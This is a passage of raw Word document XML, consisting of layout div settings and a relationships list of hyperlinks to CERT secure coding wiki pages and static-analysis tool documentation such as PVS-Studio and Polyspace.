                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="172198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61998725">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="768279155">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="7439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617">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="818574980">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="848561568">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="909073160">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="921140792">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="993293295">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1055005964">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2042823849">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="289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1926">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1220552165">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1231160841">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1452819278">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="17795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7214">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1403218037">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1429812632">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1448546600">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1221525700">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="17498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7448">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1542937173">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1595742547">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1610431815">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1738672595">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="340620709">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="15224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3027">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2114326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display/c/CodeSonar" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pvs-studio.com/en/docs/warnings/v1019/" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://taas.trust-in-soft.com/tsnippet/t/952d807d" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mathworks.com/help/bugfinder/ref/certcmem50cpp.html" TargetMode="External"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pvs-studio.com/en/docs/warnings/v679/" TargetMode="External"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/LDRA" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pvs-studio.com/en/docs/warnings/v569/" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/LDRA" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/Clang" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/LDRA" TargetMode="External"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/Parasoft" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Klocwork" TargetMode="External"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Rose" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pvs-studio.com/en/docs/warnings/v1029/" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152428" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mathworks.com/help/bugfinder/ref/certcdcl58cpp.html" TargetMode="External"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pvs-studio.com/en/docs/warnings/v730/" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/PVS-Studio" TargetMode="External"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/Polyspace+Bug+Finder"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olyspace+Bug+Finder" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pvs-studio.com/en/docs/warnings/v642/" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pvs-studio.com/en/docs/warnings/v732/" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pvs-studio.com/en/docs/warnings/v675/" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/Axivion+Bauhaus+Suite" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/Parasoft" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/Clang" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/Parasoft" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Parasoft" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Polyspace+Bug+Finder" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/CodeSonar" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/CodeSonar" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/LDRA" TargetMode="External"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pvs-studio.com/en/docs/warnings/v788/" TargetMode="External"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/CodeSonar" TargetMode="External"/><Relationship Id="rId16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display/c/Coverity" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Polyspace+Bug+Finder" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Rose" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/Helix+QAC" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/PVS-Studio" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pvs-studio.com/en/docs/warnings/v1046/" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/RuleChecker" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/CodeSonar" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/Parasoft" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pvs-studio.com/en/docs/warnings/v586/" TargetMode="External"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/Parasoft" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pvs-studio.com/en/docs/warnings/v573/" TargetMode="External"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mathworks.com/help/bugfinder/ref/certcctr50cpp.html" TargetMode="External"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=222953724" TargetMode="Externa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ww.mathworks.com/help/bugfinder/ref/certcrec.exp09c.html" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pvs-studio.com/en/docs/warnings/v739/" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/Polyspace+Bug+Finder" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pvs-studio.com/en/docs/warnings/v676/" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Coverity" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/PC-lint+Plus" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/Rose" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Parasoft" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/CodeSonar" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pvs-studio.com/en/docs/warnings/v1061/" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/CodeSonar" TargetMode="External"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pvs-studio.com/en/docs/warnings/v1007/" TargetMode="External"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/Helix+QAC" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mathworks.com/help/bugfinder/ref/certcrec.str02c.html" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Coverity" TargetMode="External"/><Relationship Id="rId16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mathworks.com/help/bugfinder/ref/certcruleint31c.html" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Helix+QAC" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pvs-studio.com/en/docs/warnings/v784/" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/RuleChecker" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Coverity" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pvs-studio.com/en/docs/warnings/v774/" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mathworks.com/help/bugfinder/ref/certcerr51cpp.html" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.securecoding.cert.org/confluence/display/cplusplus/Klocwork" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/Polyspace+Bug+Finder" TargetMode="External"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pvs-studio.com/en/docs/warnings/v614/" TargetMode="External"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/Parasoft" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Splint" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/Parasoft" TargetMode="External"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/PVS-Studio" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/RuleChecker" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Rose" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/PVS-Studio" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pvs-studio.com/en/docs/warnings/v716/" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Polyspace+Bug+Finder" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Coverity" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mathworks.com/help/bugfinder/ref/certcrulepre31c.html" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/Helix+QAC" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/Helix+QAC" TargetMode="External"/><Relationship Id="rId147" 